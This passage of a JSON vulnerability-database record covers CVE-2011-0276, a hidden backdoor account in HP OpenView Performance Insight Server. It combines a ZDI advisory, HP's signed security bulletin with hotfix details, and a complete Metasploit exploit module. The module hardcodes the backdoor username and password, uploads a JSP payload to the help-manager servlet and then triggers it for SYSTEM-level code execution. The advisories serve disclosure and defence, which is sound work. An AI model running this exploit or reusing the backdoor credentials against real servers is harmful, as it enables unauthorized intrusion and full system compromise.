Accessing these files can then lead to arbitrary code execution under the context of the SYSTEM user.", "modified": "2011-11-09T00:00:00", "published": "2011-01-31T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-034", "id": "ZDI-11-034", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:00", "bulletinFamily": "exploit", "description": "", "modified": "2011-03-16T00:00:00", "published": "2011-03-16T00:00:00", "href": "https://packetstormsecurity.com/files/99381/HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution.html", "id": "PACKETSTORM:99381", "type": "packetstorm", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "`## \n# $Id: hp_openview_insight_backdoor.rb 11969 2011-03-15 21:56:11Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution', \n'Description' => %q{ \nThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java \nclass. When using this account, an attacker can abuse the \ncom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \nallowing the execution of arbitary code. 
\n \nNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0 \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 11969 $', \n'Platform' => 'win', \n'Privileged' => true, \n'References' => \n[ \n[ 'CVE', '2011-0276' ], \n[ 'OSVDB', '70754' ], \n], \n'Targets' => \n[ \n[ 'Universal Windows Target', \n{ \n'Arch' => ARCH_JAVA, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 31 2011')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('USERNAME', [ false, 'The username to authenticate as', 'hch908v' ]), \nOptString.new('PASSWORD', [ false, 'The password for the specified username', 'z6t0j$+i' ]) \n], self.class ) \n \nend \n \ndef exploit \n \ncreds = \"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\" \n \ndir = rand_text_alpha_upper(rand(8) + 1) \npage = rand_text_alpha_upper(8) + \".jsp\" \nuid = rand(20).to_s \n \nfile = \"-----------------------------#{uid}\\r\\n\" \nfile << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\" \nfile << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\" \nfile << payload.encoded + \"\\r\\n\" \nfile << \"-----------------------------#{uid}\\r\\n\" \n# if (p.getName().equals(\"location\")); ... 
\nfile << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\" \nfile << \"Content-Type: text/plain\\r\\n\\r\\n\" \nfile << dir + \"\\r\\n\" \nfile << \"-----------------------------#{uid}\\r\\n\\r\\n\" \n \nprint_status(\"Sending our POST request...\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/reports/helpmanager\", \n'version' => '1.1', \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=---------------------------' + uid, \n'data' => file, \n'headers' => \n{ \n=begin \nthis.internal = new User(\"hch908v\"); \nthis.internal.setName(\"hidden user\"); \nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\")); \nthis.internal.addRole(\"user\"); \nthis.internal.addRole(\"admin\"); \n=end \n'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\", \n \n} \n}, 5) \n \nif ( res and res.code == 200 ) \nprint_status(\"Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...\") \nsend_request_raw({ \n'uri' => \"/help/#{dir}/#{page}\", \n'method' => 'GET', \n'version' => '1.0', \n}, 5) \n \nhandler \nelse \nprint_error(\"Login/Upload refused!\") \nreturn \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99381/hp_openview_insight_backdoor.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02695453\r\nVersion: 1\r\n\r\nHPSBMA02627 SSRT090246 rev.1 - HP OpenView Performance Insight Server, Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2011-01-31\r\nLast Updated: 2011-01-31\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP 
Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability has been identified with HP OpenView Performance Insight Server. The vulnerability could be exploited remotely to execute arbitrary\r\ncode.\r\n\r\nReferences: CVE-2011-0276, ZDI-CAN-606\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Performance Insight Server v5.2, v5.3, v5.31, v5.4, v5.41 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2011-0276 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Stephen Fewer of Harmony Security along with TippingPoint's Zero Day Initiative for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made a hotfix available to resolve the vulnerability for HP OpenView Performance Insight Server v5.4 and v5.41.\r\n\r\nFor HP OpenView Performance Insight Server v5.4 and v5.41\r\n\r\nContact the normal HP Services support channel to request the \"5.41.002 piweb HF02\" hotfix.\r\n\r\nFor HP OpenView Performance Insight Server v5.2, v5.3 and v5.31\r\n\r\nUpgrade to HP OpenView Performance Insight Server 5.41 and apply the hotfix listed above.\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nApply the \"5.41.002 piweb HF02\" hotfix.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued\r\nby HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. 
For more information\r\nsee https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\naction: apply the \"5.41.002 piweb HF02\" hotfix if HP OpenView Performance Insight Server is installed\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 31 January 2011 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with\r\nthe customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published 
Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security\r\nfeatures of software products to provide customers with current secure solutions.\r\n\r\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information\r\ncontained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for\r\nany damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties,\r\neither express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without\r\nwarranty of any kind. 
To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data,\r\nor software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products\r\nreferenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAk1GzEkACgkQ4B86/C0qfVlYeQCgrpVPadqbq5A4o9Oz/ykEuja/\r\nJboAoK42gfsFwnu3Ywe5bJNTAwx/hRDC\r\n=GnVC\r\n-----END PGP SIGNATURE-----", "modified": "2011-02-04T00:00:00", "published": "2011-02-04T00:00:00", "id": "SECURITYVULNS:DOC:25612", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25612", "title": "[security bulletin] HPSBMA02627 SSRT090246 rev.1 - HP OpenView Performance Insight Server, Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "ZDI-11-034: HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-034\r\n\r\nJanuary 31, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0276\r\n\r\n-- CVSS:\r\n10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Performance Insight\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9256. 
\r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard OpenView Performance Insight\r\nServer. Authentication is not required to exploit this vulnerability.\r\n\r\nThe specific vulnerability is due to a hidden account present within the\r\ncom.trinagy.security.XMLUserManager Java class. Using this account a\r\nmalicious user can access the com.trinagy.servlet.HelpManagerServlet\r\nclass. This is defined within the piweb.jar file installed with\r\nPerformance Insight. This class exposes a doPost() method which an\r\nattacker can use to upload malicious files to the server. Accessing\r\nthese files can then lead to arbitrary code execution under the context\r\nof the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\r\n\r\n-- Disclosure Timeline:\r\n2009-10-27 - Vulnerability reported to vendor\r\n2011-01-31 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Stephen Fewer of Harmony Security (www.harmonysecurity.com)\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. 
Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-02-04T00:00:00", "published": "2011-02-04T00:00:00", "id": "SECURITYVULNS:DOC:25610", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25610", "title": "ZDI-11-034: HP OpenView Performance Insight Server Backdoor Account Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}